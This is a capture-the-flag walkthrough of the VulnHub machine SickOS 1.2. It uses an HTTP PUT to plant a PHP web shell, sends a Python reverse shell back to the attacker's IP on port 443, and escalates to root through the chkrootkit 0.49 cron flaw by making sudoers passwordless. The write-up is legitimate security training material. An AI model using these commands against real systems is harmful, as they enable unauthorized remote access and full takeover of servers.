SickOS 1.2: Walkthrough
SickOS 1.2 surfaced on VulnHub on April 21st, 2016. Created by D4rk, it can be found at https://www.vulnhub.com/entry/sickos-12,144/. It is the second machine in the SickOS series. Running Ubuntu Operating System, the objective is to get contents of /root/7d03aaa2bf93d80040f3f22ec6ad9d5a.txt.
For the attacking machine, I will be using Kali 2017.1.
Enjoy CTFs? Take our challenge!
Once booted, this is what the machine looks like:
We start the attack by finding the IP of the victim machine by using the netdiscover command:
Now that we know our target IP, let us start by scanning the ports and try to get more information about it:
The scan shows us that the following ports are open:
- Port 22 - Running OpenSSH
- Port 80 - Running lighttpd
Let us head over to the browser to see if we find something useful:
After going through the source code of the page, I do not find anything useful. Let us fire up dirbuster to see if the server is hiding anything from us:
A quick result shows us a directory /test/ that is present:
Heading over to the directory, it is a blank directory listing.
Since dirbuster too has not come up with anything else so far, why not see what all we can do with this link? Hitting a simple cURL request to this link would be able to tell us a lot more than we know:
$ curl -v -X OPTIONS http://172.16.92.137/test
Well, that interesting! As we can see, the method PUT is allowed on the URL meaning we can create a new resource:
$ curl -v -X PUT -d '<?php system ($_GET["cmd"]); ?>' http://172.16.92.137/test/shell.php
The above query will create a file shell.php in /test/ directory along with the PHP code we added to get us a command line:
In addition, we have partially exploited the vulnerability! Now let us try to get a reverse shell:
I will be using the following Python reverse shell (more can be found at http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet ):
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.92.133",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Now let us start a listener on port 443 and send the above shell in the previous link we exploited:
$ curl "http://172.16.92.137/test/shell.php?cmd=python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22172.16.92.133%22%2C443))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27"
Note: I tried to use port 444 and 4444, but it did not work as they are blocked.
Voila, we have a low privilege shell:
Now let's explore the system and see what else is there we can exploit to become root. After some time, I stumbled upon something really interesting in /, etc./cron.daily:
cron.daily is where all the cron (automatic) jobs that need to be performed by the server on a daily basis are present, and here I can see a chkrootkit. On further examination, I see that the version of chkrootkit in question is 0.49!
After some research, it has a known vulnerability and can be exploited. I used the following exploit: https://www.exploit-db.com/exploits/33899/
$ echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
A file update would be created in /tmp/. Give that file the following permissions:
$ chmod 777 /tmp/update
Once done, wait for a couple of minutes and then type:
$ sudo su
Now we have root! Let us head over and read the flag.
What should you learn next?